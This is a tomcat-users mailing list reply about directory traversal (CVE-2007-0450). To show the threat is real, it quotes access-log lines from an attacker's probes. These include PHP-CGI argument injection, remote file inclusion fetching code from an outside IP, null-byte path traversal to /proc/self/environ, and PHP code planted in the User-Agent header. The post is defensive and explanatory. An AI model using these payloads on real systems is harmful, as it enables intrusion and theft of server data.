tomcat-users mailing list archives

From André Warnier ...@ice-sa.com>
Subject Re: Need help to understand CVE-2007-0450
Date Thu, 22 Nov 2012 13:26:08 GMT
Athanasios Kostopoulos wrote:
> On 22/11/12 10:52, Aditi Sinha wrote:
>> Hi Andre,
>>
>> Agree with your points.
>>
>> Just wanted to know more about "Directory Traversal Attack".
>> Can it lead to access of directories outside Tomcat/webapps folder also
>>   or can it just try to access the applications within Tomcat/webapps
>> folder only?
>>
>>
>> Thanks & Regards,
>> Aditi
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> For additional commands, e-mail: users-help@tomcat.apache.org
>>
> Hi everyone,
> OWASP maintains some nice resources about path traversal attacks. A nice 
> starting point is the following:
> https://www.owasp.org/index.php/Path_Traversal
> 

And for anyone that would think that this is not a genuine concern, here are a few recent samples from a logfile of one of our servers (among many, many similar ones):

173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /index.php?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /main.php?x=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"